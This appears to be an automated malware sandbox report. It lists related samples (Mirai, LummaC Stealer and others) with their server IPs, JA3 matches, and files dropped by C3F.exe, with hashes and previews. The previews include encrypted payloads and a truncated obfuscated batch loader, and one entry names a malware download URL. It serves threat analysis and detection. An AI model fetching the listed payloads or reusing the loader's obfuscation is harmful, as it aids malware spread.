                                                                                                                                                            OVHFRdb0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                            • 51.71.23.38
                                                                                                                                                            5RaYXoKFn9.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                                                                                            • 51.161.195.129
                                                                                                                                                            5RaYXoKFn9.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                                                                                            • 51.161.195.129
                                                                                                                                                            xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 46.244.32.13
                                                                                                                                                            armv6l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 51.71.11.76
                                                                                                                                                            http://167.114.127.95/ISIS.shGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 167.114.127.95
                                                                                                                                                            loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 158.69.15.230
                                                                                                                                                            loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 94.23.192.99
                                                                                                                                                            hfs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 94.23.66.84
                                                                                                                                                            armv5l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 139.99.86.60

                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eweb44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 192.185.175.158
                                                                                                                                                            random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 192.185.175.158
                                                                                                                                                            eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 192.185.175.158
                                                                                                                                                            Supplier.batGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 192.185.175.158
                                                                                                                                                            Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                            • 192.185.175.158
                                                                                                                                                            NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 192.185.175.158
                                                                                                                                                            Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                            • 192.185.175.158
                                                                                                                                                            lumma.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                            • 192.185.175.158
                                                                                                                                                            GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                                                                                                            • 192.185.175.158
                                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e1web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 51.79.230.147
                                                                                                                                                            • 45.118.248.184
                                                                                                                                                            • 192.185.146.136
                                                                                                                                                            setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 51.79.230.147
                                                                                                                                                            • 45.118.248.184
                                                                                                                                                            • 192.185.146.136
                                                                                                                                                            SharkHack.exeGet hashmaliciousLummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                            • 51.79.230.147
                                                                                                                                                            • 45.118.248.184
                                                                                                                                                            • 192.185.146.136
                                                                                                                                                            Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 51.79.230.147
                                                                                                                                                            • 45.118.248.184
                                                                                                                                                            • 192.185.146.136
                                                                                                                                                            Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 51.79.230.147
                                                                                                                                                            • 45.118.248.184
                                                                                                                                                            • 192.185.146.136
                                                                                                                                                            #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 51.79.230.147
                                                                                                                                                            • 45.118.248.184
                                                                                                                                                            • 192.185.146.136
                                                                                                                                                            random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 51.79.230.147
                                                                                                                                                            • 45.118.248.184
                                                                                                                                                            • 192.185.146.136
                                                                                                                                                            UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 51.79.230.147
                                                                                                                                                            • 45.118.248.184
                                                                                                                                                            • 192.185.146.136
                                                                                                                                                            PI1EA8P74K.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 51.79.230.147
                                                                                                                                                            • 45.118.248.184
                                                                                                                                                            • 192.185.146.136
                                                                                                                                                            eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 51.79.230.147
                                                                                                                                                            • 45.118.248.184
                                                                                                                                                            • 192.185.146.136

                                                                                                                                                            Dropped Files

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\BookingsNativeApp_G5L1NHZZ.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                              sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                  'Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                    Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                      Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        JSWunwO4rS.lnkGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                          Yn13dTQdcW.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                            DM6vAAgoCw.exeGet hashmaliciousOrcus, XmrigBrowse
                                                                                                                                                                              Setup.exeGet hashmaliciousVidarBrowse

                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                Category:modified
                                                                                                                                                                                Size (bytes):1019
                                                                                                                                                                                Entropy (8bit):5.236946495216897
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:YqHZ6T06Mhm4ymNib0O0bihmCetmKg6CUXyhmimKgbxdB6hmjmKgz0JahmcmKgbR:YqHZ6T06McoEb0O0bicCewHDUXycLHbR
                                                                                                                                                                                MD5:5D20D9B3F928AC964E07C561FD8A3F42
                                                                                                                                                                                SHA1:B702BE149FCF94831A975F2CD06B2DFE020D9632
                                                                                                                                                                                SHA-256:59A4F22870D7A7DC3339917C89FF6AF09FA762AF39F0624338FDDFF631730492
                                                                                                                                                                                SHA-512:30E5F275FFB475A403439C3A4DCC05F3E12A6914D93F20EB38AF3240A7F693A455C25C005A3681AB39C89BFAD9AE66FAAE3874B987FAC48BB6A5439194FDCEDC
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":7763552,"LastSwitchedHighPart":31061488,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":4292730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4282730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4272730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4262730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4252730848,"LastSwitchedHighPart":31061487,"Pr

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Bus

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\C3F.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):89088
                                                                                                                                                                                Entropy (8bit):7.997894676048347
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:1536:BhBfWL3/WpnJyNBXWPkbgFjcRnlibR0R/V8zuk3hInzfnSuKfo98CbHvOJKn0GXe:BhBfWrWp9PkbW5buhV8Ks8fngfo9803E
                                                                                                                                                                                MD5:B801B07EDE1FD827573114FA8332409D
                                                                                                                                                                                SHA1:BE62683D0374D61B40FAA2D88ED7D47F5AAEE57C
                                                                                                                                                                                SHA-256:FC5F27DCAA5271F50C6CC96AAAE0212E7D6155C8B49B864B3B480607EAB133E1
                                                                                                                                                                                SHA-512:61764558BBED4B47FA0266DB025E64231D85935995A2535522945DCB0F59101D11224853EA0DF793A43A8E70825660942E7466187DF9BB35144F85CC8B98F696
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:AzS{.6.tob......U.j.T..Q....*b...B...iyD..(.{.+..S|y....R....Kp^T.DC..mRGtP$SB...k........I=...X.i&...z.r...Z..|L.w.{..L.t..z.....t.9.....;/.`5R.Q.....r...]i.9+F...|.f.../..%.7f..fM.!...|.{L....d4]...d.}7.:[...W..t....:..l.......D`..r.F..!...R6e....B5........_C...1.h9..n..q....Z......O..1.c.x.S..xY.x.....7z.|@....T.|5.v.,.I...&./.p...%...e..=x...7C.k[hkH..|.eG.u..|..y.F...@....AX....d..A...F.....i...{.`....N/*...|...V%.d.K.v.>.d....F.....b...~%>..%..z...%........[..."T.x..#.S.,.R.-.(x.+.&...\....t$0...}.7.\;.!..^...J.V.J.h.Kg66b..M......4.O..7Q..),.q.Z...j.".&.jWW."....O..Q.5....Y.f....8.{....=....S.olo*....h.....f....dz7.;B.Z.(....g..k[c....G.Y5T.6.....7.....x...*...~.. ..$.[...q.L~.....j...v..p.u-.n.b/..`0\..^.;..=&U.O.K.;.=.O8.mY.T.t(l..d..L.g+.....*'.Sd`=.O+.E2#.....E....j.8....l.)..'@....vy..ZlLZ..9..s..}h......p..q9462.......A.!..k..E.j......^.8N.w.....SP3..w...A.;@4..#P.%s6,...M......H..3.<..........k..:....,&.......)$..o6...Q..M.b.-R.T.."

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Delivering

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\C3F.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):76800
                                                                                                                                                                                Entropy (8bit):7.997946899641085
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:1536:JlVaXdWB+L7vmYtafisr0S7HptjpcV0bGeot/sOFfq1VisKo9awGOePu1Cd2Dm:ty9Xv3xBS7HpVpGsmKssKo9aoecDm
                                                                                                                                                                                MD5:5672823394F20CEEC679160C3EE97986
                                                                                                                                                                                SHA1:B37ED4BF8C2D39DC29E1445DFCEF76F7349B83AE
                                                                                                                                                                                SHA-256:ECF6A26E46C30D120E9E59EC8304205DCEB0264B850A5D280B583B0D37906E5F
                                                                                                                                                                                SHA-512:E2D4A5BDF71A84C647E136192B9C76D7F237C2E438B21B1CCA96DF216CE2E80BF29B08647C562C4CD3B059A6DF8A762FA6591D271F0FF0A81F623A9C150886C3
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:.g.C.-w..e..A.........b.,..5..$.H;......i.RF....I.)p..W....0.B.....F.~../..M....c8...r..8.'.u.L... ..blb{..K..13....).&..W...O..T.V...C........l.h......|x...%.>t..x..O..^....`%....yY...\]-...+X..i...[.....=.p.a.&.l.=...".S..6%..M...pdU.....w...u2....?U.. ....v.....*....E/..E..k.g;l..\..D.3.}Hg...MJ{(..U.}....H]..IRb.uJ.Rq....[.K .>..\....h...z8.g8.....&&>^..1j.=z...!.R...F7V>.q.s .i|..n.l+7#..gv.2.@...By.'.N^.....g*......7...>.3r.}9.&GY..vfdwZ.L.J*..r:..E....U......kL.;YZ:..{"....eB.T.X..5.{...Z...M...(^....t.E..g.9....1.E.KlP. .k.J..C...F...g5Q.%m!....-.I......!_rR.d.........*k...9...F.9....F..|o.w....'g....t.1]&.t3.c..F..... .b..%X......9.....;/.0.z }D.....e.7.J..+...V.T@.%...2spX....j..Y..M...K#.W.5C..=....Z.. ..6%z..L>@`.&.D\.[..X#z..`.4..[...%.Du...)...a........Z..g.....*t...,w`.J<.[....0.<..Y.cJ~x..m.TM./9..KU.....%..7..!..*....b..Bo8U....u...W5....X..y+4P..$cjl..`.Xy....ue`...C".xv1..D.....(.T...b]K$..:..N`;..As.h.f..v....MZ.

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Earrings

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\C3F.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):62464
                                                                                                                                                                                Entropy (8bit):7.996930228385904
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:1536:iPQUiWPMV6RUaMJSYhP/XfDi7mEiWGRBM4By1Kp:i4akAuaMtXfD1ErGRS4Bywp
                                                                                                                                                                                MD5:016A3B26A8C8DA9D9A34DC80D69EC8E1
                                                                                                                                                                                SHA1:1141AB027AE28888F47B0F23D1EAE29D5D2A99CB
                                                                                                                                                                                SHA-256:87F2B94E0DDB84944B8BFF3F4CD4941B068F73F4EAA84D95ABE09C2E99F4FA0F
                                                                                                                                                                                SHA-512:B6FAF11610140C4D947C2B2DBBCDE6D3CDE45F75A75A0BFFDA314D46DFFC3F58E4BE7726ACE1BBF66091B8026E8937F41A9C6987852EED520E0C2BE2BB2FB06C
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:Q_N.]..H...r.yf.{.5&@.}.<...D.?].(..@.h.j3Tv...O.Sesv...@N..|.y...N.....F....w-.&C.B.@..U..t....`4Du.~...?UjIu.N..O.].../.@...../$.O....B.......y...l.....M....j6.W..x7....T._.4.........". XM.z.5..z..P...E.>.R...3...wq7.tf.*.S..7.}.....3.*".6....[.sf_......<.+.4RY....P..V...v.0................6%B..>\7>.V.q.b.,.C.av....$...\f0.....#..XO7.k..H....$&.Q.L.8...~h/..a.........U.M|.j3.....C..h..r..y.+.:....)S...'><.4.......M...:...+q.fo...y.......u....\^[.V.0v...v..^.....m_.........t.:....O..K.J.g..Z....0.eN...=;...Rk.....pf....bO.B..wX..^..j.x+^G.u...;..E...!v....c....F...EJ.7PFH..... .....6..t..T...39..(m.k..FHI9.~....wh., C..pX.?...l..*,..Q.......5s>.9...c.....Z..M4...W......K3...M....c..(.\.0.P.6.v....'.~.. yr-.f...G.......gC...~E....ybdY.w.._.._<..}G...Z..n.........v;Z...qNY..sC...$l..k..n/.#.s.k....d...k..zWm.M.<....{....M..FP.|,.......Z.7....X.|...b.....Z........].d.Bc..(....s.P...o...4....f].zo.*..!../....Ik..~......t..Q.PtO....&.L.i.

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Focused

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\C3F.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines (471), with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):8937
                                                                                                                                                                                Entropy (8bit):5.210815190077583
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:+3CrXjwTlwTrxPbyaA913d1JAHZADuFYc6DOgmSbbo/m0oyQ:ZTeUrxPbjA913LJAHHmHGq5
                                                                                                                                                                                MD5:3DBFA80F063079E66F819DA8452E17BB
                                                                                                                                                                                SHA1:2D546875602A5ED7ED181F0A6D372A0A112052DE
                                                                                                                                                                                SHA-256:FF670D805EBBD0CCA4F133162C3D67E9EC67CB514FC411DC268ABE28D4F54510
                                                                                                                                                                                SHA-512:2261F68FB1362B9E088339375F35EA463E090249573B5D60D4C02069E8E45254543097BE4CC28970C91DA807A0D84F97F1EC56DDFEBD87B8B326E9C9F8D68E65
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:Set Chapel=V..mfDFist-Motherboard-Textile-See-Tub-Emacs-Solaris-Discipline-Hrs-..BbComing-Chapter-..eqbSacred-Byte-Societies-Feb-Representations-Pine-Objective-Stomach-..iKEmerald-O-Breasts-Penalty-Uk-Selling-Testimonials-Nuke-..XvesChem-Chip-..UznRefresh-Cholesterol-Curious-Resorts-Measurement-Appeared-Disco-Posts-..egzNMonth-Audience-..LjuSpectrum-Situation-Projector-Saves-Acceptance-Luggage-Lets-Inspection-..Set Disturbed=S..GYDFrancis-Talks-Follows-Tribune-Titanium-Filters-Metropolitan-..ZLStarted-Disputes-Bacon-License-..pkVc-Describing-Pipeline-Death-Council-..AYReservations-Theory-River-Too-Functional-Incorrect-Boy-..QsSIowa-Ten-Heated-Something-Slovakia-Sake-..qZkcIncentive-Nude-Humor-Product-..iGxSim-Freeware-Bicycle-Voyeur-..Set Hughes=E..sFaHMove-Ni-Ran-Passes-Shoppers-Providence-Suggested-Beauty-Committees-..NLaChoosing-Often-Dry-Snow-Functionality-Strand-Greene-Johnston-Recently-..sscWTh-Acc-Carroll-Terrorist-Suits-Alias-Mainly-Ruled-Gis-..aWLinda-Guild-Eve-Foam-Barbados-B

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Focused.cmd (copy)

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines (471), with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):8937
                                                                                                                                                                                Entropy (8bit):5.210815190077583
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:+3CrXjwTlwTrxPbyaA913d1JAHZADuFYc6DOgmSbbo/m0oyQ:ZTeUrxPbjA913LJAHHmHGq5
                                                                                                                                                                                MD5:3DBFA80F063079E66F819DA8452E17BB
                                                                                                                                                                                SHA1:2D546875602A5ED7ED181F0A6D372A0A112052DE
                                                                                                                                                                                SHA-256:FF670D805EBBD0CCA4F133162C3D67E9EC67CB514FC411DC268ABE28D4F54510
                                                                                                                                                                                SHA-512:2261F68FB1362B9E088339375F35EA463E090249573B5D60D4C02069E8E45254543097BE4CC28970C91DA807A0D84F97F1EC56DDFEBD87B8B326E9C9F8D68E65
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:Set Chapel=V..mfDFist-Motherboard-Textile-See-Tub-Emacs-Solaris-Discipline-Hrs-..BbComing-Chapter-..eqbSacred-Byte-Societies-Feb-Representations-Pine-Objective-Stomach-..iKEmerald-O-Breasts-Penalty-Uk-Selling-Testimonials-Nuke-..XvesChem-Chip-..UznRefresh-Cholesterol-Curious-Resorts-Measurement-Appeared-Disco-Posts-..egzNMonth-Audience-..LjuSpectrum-Situation-Projector-Saves-Acceptance-Luggage-Lets-Inspection-..Set Disturbed=S..GYDFrancis-Talks-Follows-Tribune-Titanium-Filters-Metropolitan-..ZLStarted-Disputes-Bacon-License-..pkVc-Describing-Pipeline-Death-Council-..AYReservations-Theory-River-Too-Functional-Incorrect-Boy-..QsSIowa-Ten-Heated-Something-Slovakia-Sake-..qZkcIncentive-Nude-Humor-Product-..iGxSim-Freeware-Bicycle-Voyeur-..Set Hughes=E..sFaHMove-Ni-Ran-Passes-Shoppers-Providence-Suggested-Beauty-Committees-..NLaChoosing-Often-Dry-Snow-Functionality-Strand-Greene-Johnston-Recently-..sscWTh-Acc-Carroll-Terrorist-Suits-Alias-Mainly-Ruled-Gis-..aWLinda-Guild-Eve-Foam-Barbados-B

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Grey

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\C3F.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):86016
                                                                                                                                                                                Entropy (8bit):7.997944775258056
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:1536:JEzN95shG2gxHEE8p8Rus4v9eTqZafFdv86OtKlFLqZEbo+dmbrLTpf4P9ZxnQNV:SV/HEVVstqZa/nMK7PdkXXpA1kv
                                                                                                                                                                                MD5:BFC2EF690ABD60002324EC2CC3696054
                                                                                                                                                                                SHA1:B1F644C44B1AAC3D04A8E96675CF5CFA0DF87F3D
                                                                                                                                                                                SHA-256:19451D2D5981F98EB831F5E6F44102A3321A9C91943477209AD9856FF98A6086
                                                                                                                                                                                SHA-512:C1A890D7DCE2BA2F5865F89AE0BC5D0B81529094414F199D0F961E5B63514A0706F6E1644C12868FDC254BADA1F01D38831BCF7BEE814F6320A272B7BE959600
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:....c9\.=.~n..z....15.u....=.z[.N....d.....A\...A...F.];.....15.a.<@..._...c.~..w.H...".J..W........6.DL....0.f.Xc/^..>-2.p...mD..f...E.b.......W....H..[U:..`..m.......8O.j....n,;..6T..2"..;...r~\c...h.Jv...~...iH.....I....r..4v....Zn....y.....w......F.m.U\K.Wp.4[.w......@...5J".-.....F}.I...../0.f.>.Vt.3E.sGK"....l..#.}...1....LO#..K..>..s.........9|...v....\S.U....0.........>.}....wV...PX.N..e=..-/...%.......Oa....b..m[.....v....G.'...$+J...}.%...2.X...,..9^.....f...M\!-.O...XE.F.n.;K.$H.........><.>i).........!.....`Pjl.......yP..C......(Gog....._.,..T...f........T.........&....l1....\Qy..Z..i...ij_c.~.a...........<H.zN.3.z.y."...Vtfx"m.{..\...\.G.*.......s.........;..\P.......+..-......,u=.O....4KK..b!.ij.6.Oj..6..j...<.jaTA...9_.(.......%q.r..p:..Jw....|Aj$&..y.K..W...;..`...s.NQ~C~...m.......-._..<...E.'....^...-..;.$.L.Q...J.F...+...Xf..IFn+iug........|.....t..?..?q.)...A.M..0IU.......OZ...%R.`.hl.=.._yQ.-K.....V_.4.E.G..#

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Modules

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\C3F.exe
                                                                                                                                                                                File Type:Microsoft Cabinet archive data, 489383 bytes, 12 files, at 0x2c +A "Underground" +A "Dp", ID 7503, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):489383
                                                                                                                                                                                Entropy (8bit):7.998389327797799
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:12288:pDSsjADpS2B3hxUoDyTEH9JtzPLKzn9zye1g/kdGGvwWK+ZE4iJ:JZ0o8AoeT+ftSJye126Rvw2hQ
                                                                                                                                                                                MD5:233B811FCD8464B447474B381358A65C
                                                                                                                                                                                SHA1:268369A6631FC5C219E50165ADB9CCAA3C2CCB33
                                                                                                                                                                                SHA-256:57CFAB2ECF4E58E4704CAE0A7ADCD46EE8C3045F8A74037F2BCF290210E07DED
                                                                                                                                                                                SHA-512:BC71CA17E79E50ECD12722B7C360CD44CEC2C46301F0A33EFF716CB09CA00FD37C115481C08C9B96D0E7044A55DBBC0CB41EA40FEC15F61E4A29116E722878AA
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:MSCF.....w......,...............O...A..................Y#. .Underground............Y#. .Dp............Y#. .Cleveland..|.........Y#. .Riders......'.....Y#. .Finish............Y#. .Hotel....._......Y#. .Burns..t.._......Y#. .Rd....._P.....Y#. .Gmc..4.._......Y#. .Entities..<.._4.....Y#. .Presentation....._p.....Y#. .Univ..#..bP..CK.}`.E.0>..dI.f........A.. aA.0.h.6.l.@.N.q...`..#.8Ydh....;.NN..=..;...d...(..%|.As...4@.,.d~U=.I@}..y............m.gL.....W*#..F..xY.4.B.z>I.".~..J.Z.H./.,+[L....h..p..x.'.{.D.$..YMJ..4....q.w..g..-..-.;:..._.....D..G.."/.,.r6.+...i..S...`.....\ .h....].5.....wrf..L ...b.8.'yf...).e.....j....*&.VM.pR7...B..K.k.&.....f.Y...m...p...!Bf.d....aQ..@+$^.......e$^..%Y.&i.......J......!...0...)...CK.Z.uR>.."_..6...1I.p../._...F..O.lr..r...o*B....Y<.%.?V...U.:..Y..&Q.*.......-.$;....:1.K.H-.*-..:.!H.wd..2.J.......Y..`9..ti.S!..3.j.us^.9G.H#.s.Z.7.TD...4.cmC.v..._......N...@F.C.-U...8..I6M..u.x..{me..N.\i...?...[.I.....6....0.~M.B.Z.'...

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Project

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\C3F.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):68459
                                                                                                                                                                                Entropy (8bit):7.997258142405833
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:1536:270v/Cujr6YyBnpTFAEOkjhA9QE93Jb+jYW8/3YyRv3GnIkAZ:2AQ5pTFAbsmX1YyJp
                                                                                                                                                                                MD5:0442C1BA281F7F9E2190C89AA020F1ED
                                                                                                                                                                                SHA1:575A7E100B8CA4AAF4CE03338841EF150267E2FB
                                                                                                                                                                                SHA-256:799C405A39EE108A032E22197345BE89B8FC7DB93D03B4CAEDCFE2F7094B7D51
                                                                                                                                                                                SHA-512:E373175534B7831372F2665A545428A98606EBBDFFC5C162025EEF3A6A9D975A52FB91EF0D19493C71AE404158105FE501C1A2C07EA17C1D7B732D605B8A9954
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:.*..b..3+..K[......T@<\e.{...o..~...CWzl...E.qs....:..zG..D..?.CmT_..P.%$..c..72.U..;..`?d.m],......r.I..KM..H...1.....I......3..m[\.*.f.....{&?..Ps....\..0/...u......,.......(&..:.....cq5X.f.(.1...= E..'].4.4......V.^.t/...{..~.~H.y4....A...l..`s.p...=.*.m.y..5}Z..QG.... .0..u.Q..S9.....Y.).l....W.7b..c..k..Wmke.M.v...K..).........B..).s.KJ=.4.k..*...{..(W.f.......<.n..h.W`]...;.....JK.i...B.\9]59... .e^..[:..o...=.s.....A....7Hip...f.-._c.*..^N..Y.m..?.M.'.lY....6..bi.:.N..Ml.b.q....sg8....3......%...$*..../N..qSR5..X3.../.;..8l.1.*.)...F.N...u.%l$..)R$.......{{.D.....K.&j.......sbRK.84....O@..u..Q.K.......{.........Hty"...h....3.V.....z%../..'eY.Hm.}.1S=.....0.............9..I..4.MWdf.......;..(......Ii.h..E.....f...SO..........W.f'........x...6.y.1.'T.yjGT.2..E..N.l..n.L.....AT..}..G.R.)Ji...t.MW....Pk..%..\.a.p..RV.$p..e....}.A..c.....]mc...\-.z..MY.....9.wO.)]...`.x..+...[.['.$....../El..`..k^U...DL#....?....c..Jq..fZ

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Spare

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\C3F.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):66560
                                                                                                                                                                                Entropy (8bit):7.997251702224176
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:1536:wcGxystPcx1SzZ1vcq+r0nbwEFfmw3iwiiObrv+9H0Es:wcRycx1e1vcq+Inb9faD7Vd
                                                                                                                                                                                MD5:4AC8DA0D7E11A8F1E33A1203D4F5ADBC
                                                                                                                                                                                SHA1:E1A647384E80BB07A48D6162E39620E0D3081B7A
                                                                                                                                                                                SHA-256:C78D8701DE6B1E347E138FF4AFB6948E95BC3B5A6012C7C44FA8508B415F8023
                                                                                                                                                                                SHA-512:E124850FC27DBB6A52991410D977A2BB77928F8AC387A796AAC692373D08B9EF809B409F2F8EABCBF694B06630C7A9A4CD263B36DD43DF8D8257AC5FC936FDA9
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:...2....c...XJ...V.,...7.....o....I\....O/...U...r9_..-?.xp....FY.T8.......3.q...E.j..j..Q).-qc.O.D..{k.....t.&....{,h.}.S.1..{...#tI....p...L...M......vqs..4.L34G.F..!9.6.B.(g.F. . .)z. .|..'i=._pU.<\._f<v.|V...]D.-.e #.N}..!.s...A....Jr+..F.l@.5!...[......A.<..S....Y.N...I......i..U.2.Y SM.....'.*.....n.TCg.k..vxy...t.~,..w.q..x...C.@.Nu..xP.N.H;.........7...x.`...JX4.n.O.q..q........}W.....'......cm....Xio...#.4rP.9....h)+.}...y.....4A... .*/X..zk...JI..s........A.TjI......BA.ff}.{!.;nA5+.ZD.+.Hv.4.jO....:.Q......hA.#..q......;\.&..."6.1:?....{g...u.....bx.cf...g.o.w.C...k.u.=...Z7O_$.}.] .$}.............b.1....rl......_...5.U .S.''N.....J.7......"......Y..(.-^1n....u..#..`%.....f....x....&<.=..c*f^}$"....N....%.(.\..d2H.{A.&....AKx.{..o0.+D.UGlyR%O.3f....!...?...n..w...$.U9....1..M.@.U/.^.&.9.......<...n.a..a....I..9f..=%....P.6.6.)..x..................r.<.D}Xv....\...q..k.J....e)..-../.+......Ujvrp.p;.............3....H....

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Wisdom

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\C3F.exe
                                                                                                                                                                                File Type:data
